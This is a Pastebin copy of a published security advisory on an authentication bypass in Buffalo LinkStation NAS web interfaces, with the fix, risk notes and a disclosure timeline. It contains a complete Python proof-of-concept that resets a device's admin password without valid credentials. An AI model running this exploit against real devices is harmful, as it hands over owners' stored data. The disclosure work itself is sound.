Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Advisory: Buffalo LinkStation Authentication Bypass
- An authentication bypass vulnerability in the web interface of a Buffalo
- LinkStation Duo Network Attached Storage (NAS) device allows
- unauthenticated attackers to gain administrative privileges. This puts
- the confidentiality and integrity of the stored data as well as the
- integrity of the device configuration at high risk.
- Details
- =======
- Product: Buffalo LinkStation Duo (LS-WXL), LS-CHL(v2), LS-XHL,
- LS-WVL, LS-WSX, LS-VL, LS-QVL, LS-XL
- Affected Versions: 1.34, 1.69, 1.70
- Fixed Version: 1.71
- Vulnerability Type: Authentication Bypass
- Security Risk: high
- Vendor URL: http://www.buffalotech.com/
- Vendor Status: fixed version released
- Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-006
- Advisory Status: published
- CVE: GENERIC-MAP-NOMATCH
- CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
- Introduction
- ============
- LinkStation is a brand name of Network Attached Storage (NAS) devices
- manufactured by the Japanese company Buffalo. The stored data can be
- accessed via several protocols such as SMB, FTP, AFP and HTTP. A web
- interface is provided for management purposes.
- More Details
- ============
- The web interface can be reached via HTTP in a web browser. On opening
- the web interface the user is first presented a login screen where a
- username and a password must be supplied. On submission, an HTTP POST
- request is performed by the browser:
- POST /dynamic.pl HTTP/1.1
- Host: 192.168.1.2
- [...]
- bufaction=verifyLogin&user=RedTeam&password=Pentesting
- In the request above, the username "RedTeam" and the password
- "Pentesting" were supplied. The chosen credentials are invalid as no
- user with that name exists. The application responds with a JSON-type
- reply:
- HTTP/1.0 200 OK
- [...]
- {
- "data": [
- {
- "pageMode": 2,
- "sid": "5e0f9249a6cc5137d051514c47b2bb9b"
- }
- ],
- "errors": [],
- "success": false
- }
- On the contrary, if valid credentials of an administrative account are
- supplied, a reply similar to the following is received:
- HTTP/1.0 200 OK
- [...]
- {
- "data": [
- {
- "pageMode": 0,
- "sid": "b9466fbff0c2f277449015d6e110b173"
- }
- ],
- "errors": [],
- "success": true
- }
- It was found that in both cases valid session IDs are generated and only
- the client-side JavaScript web interface restricts their usage. This is
- triggered by the key "success" within the reply. If the field is set to
- "false", an error is reported and the user is asekd to authenticate
- again. Otherwise, the user is allowed to use the web interface.
- Furthermore, the administrative functions are restricted only on the
- client-side as well. The key "pageMode" was found to be one of the three
- integers representing the type of the user account:
- 0 - administrator
- 1 - regular user without administrative privileges
- 2 - guest user without any privileges
- Thus, an attacker may simply provide invalid credentials while tampering
- the keys "success" and "pageMode" of the reply in transit (for example
- by using a proxy). The attacker may then use the web interface as an
- administrative user from the browser. Alternatively, a valid session ID
- may be requested using invalid credentials and then used directly to
- execute privileged operations by sending the appropriate POST requests.
- This eliminates the need for tampering the returned JSON-data. Such an
- attack is implemented in the Proof of Concept section.
- Proof of Concept
- ================
- The following Python script exploits the described vulnerability and
- sets the password of the "admin"-account to an attacker supplied value.
- ------------------------------------------------------------------------
- #!/usr/bin/python
- import argparse
- import requests
- import json
- import sys
- parser = argparse.ArgumentParser(description='Buffalo LinkStation ' +
- 'Authentication Bypass PoC')
- parser.add_argument('host', help='Hostname or IP address of target ' +
- 'device', type=str)
- parser.add_argument('-p', '--port', help='Port of target device',
- type=int, default=443)
- parser.add_argument('password', help='New admin password', type=str)
- args = parser.parse_args()
- def get_session_id(url):
- headers = {'User-Agent': None}
- payload = {'bufaction': 'verifyLogin', 'user': 'RedTeam',
- 'password': 'Pentesting'}
- try:
- sys.stdout.write("Trying to get a session ID... ")
- sys.stdout.flush()
- r = requests.post(url, headers=headers, data=payload,
- verify=False)
- except:
- sys.stdout.write("could not connect to target.\n")
- sys.stdout.flush()
- return False
- if r.status_code != 200:
- sys.stdout.write("bad reply.\n")
- sys.stdout.flush()
- return False
- try:
- reply = json.loads(r.text)
- sid = reply['data'][0]['sid']
- except:
- sys.stdout.write("error while parsing reply.")
- sys.stdout.flush()
- return False
- #do not check success key of JSON reply here.
- #it will most likely be false (user/password wrong)!
- sys.stdout.write("ok.\n")
- sys.stdout.flush()
- return sid
- def set_admin_password(url, sid, password):
- headers = {'User-Agent': None}
- payload = {'bufaction': 'setUserSettingsadmin', 'userName': 'admin',
- 'userId': '52', 'userDesc': 'Built-in account for ' +
- 'administering the system', 'pwd': args.password, 'confPwd':
- args.password, 'primGroup': 'admin', 'quota_soft': '',
- 'quota_hard': ''}
- cookies = {'webui_session_RedTeam': '%s_en_0' % sid}
- try:
- sys.stdout.write("Trying to set admin password to %s... " %
- password)
- sys.stdout.flush()
- r = requests.post(url, headers=headers, cookies=cookies,
- data=payload, verify=False)
- except:
- sys.stdout.write("could not connect to target.\n")
- sys.stdout.flush()
- return False
- if r.status_code != 200:
- sys.stdout.write("bad reply.\n")
- sys.stdout.flush()
- return False
- try:
- reply = json.loads(r.text)
- success = reply['success']
- except:
- sys.stdout.write("error while parsing reply.\n")
- sys.stdout.flush()
- return False
- if success == True:
- sys.stdout.write("ok.\n")
- sys.stdout.flush()
- else:
- sys.stdout.write("failed.\n")
- sys.stdout.flush()
- return success
- requests.packages.urllib3.disable_warnings()
- url = "https://%s:%s/dynamic.pl" % (args.host, args.port)
- sid = get_session_id(url)
- if sid == False:
- sys.exit(-1)
- if set_admin_password(url, sid, args.password) == True:
- sys.stdout.write("\n")
- sys.stdout.write("Admin password successfully set!\n")
- sys.stdout.write("URL: https://%s:%s/\n" % (args.host, args.port))
- sys.stdout.write("New credentials: admin : %s\n" % args.password)
- sys.exit(0)
- else:
- sys.exit(-1)
- ------------------------------------------------------------------------
- Workaround
- ==========
- If possible, disable access to the web interface, for example via an ACL
- in the responsible ethernet switch.
- Fix
- ===
- Users should install firmware version 1.71 or higher to ensure proper
- server-side authentication. In addition, a password should be set for
- the "guest" user account, which is by default present and enabled, but
- does not have a password.
- Security Risk
- =============
- This vulnerability allows an unauthenticated attacker to gain administrative
- privileges on a Buffalo LinkStation. All attached storage devices may then be
- accessed by the attacker. This puts the available data at risk as confidential
- information may be disclosed, valuable information destroyed or manipulated.
- Depending on the firmware of the device, an attacker may also be able execute
- malicious code on the LinkStation either via installing a customized firmware
- image[0] or by exploiting a publicly disclosed remote command injection
- vulnerability[1].
- It is therefore estimated that the vulnerability poses a high risk to
- anyone who uses an affected device.
- Timeline
- ========
- 2015-03-30 Vulnerability identified
- 2015-04-09 Customer approved disclosure to vendor
- 2015-06-09 Vendor notified
- 2015-06-09 Vendor responds: vulnerability is fixed in version 1.70
- 2015-06-09 Verified that vulnerability is not fixed in version 1.70
- 2015-06-09 Vendor responded: vulnerability is already known and being
- worked on, release date is not known
- 2015-06-09 Vendor provided list of affected devices
- 2015-07-10 Vendor queried for update, no response
- 2015-08-03 Vendor queried for update (by phone)
- 2015-08-04 Vendor responded: advisory has been forwarded to development.
- 2015-08-04 Vendor queried for estimated fix
- 2015-08-13 Vendor announced fixed version 1.71
- 2015-09-04 CVE ID requested
- 2015-09-07 RedTeam verified that the vulnerability has been fixed
- 2015-10-07 CVE ID not assigned, may be "duplicate finding"
- 2015-10-08 Advisory published
- References
- ==========
- [0] http://buffalo.nas-central.org/wiki/Category:LS-WXL
- [1] https://www.andreafabrizi.it/?exploits:terastation
- RedTeam Pentesting GmbH
- =======================
- RedTeam Pentesting offers individual penetration tests performed by a
- team of specialised IT-security experts. Hereby, security weaknesses in
- company networks or products are uncovered and can be fixed immediately.
- As there are only few experts in this field, RedTeam Pentesting wants to
- share its knowledge and enhance the public knowledge with research in
- security-related areas. The results are made available as public
- security advisories.
- More information about RedTeam Pentesting can be found at
- https://www.redteam-pentesting.de.
- --
- RedTeam Pentesting GmbH Tel.: +49 241 510081-0
- Dennewartstr. 25-27 Fax : +49 241 510081-99
- 52068 Aachen https://www.redteam-pentesting.de
- Germany Registergericht: Aachen HRB 14004
- Geschäftsführer: Patrick Hof, Jens Liebchen
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement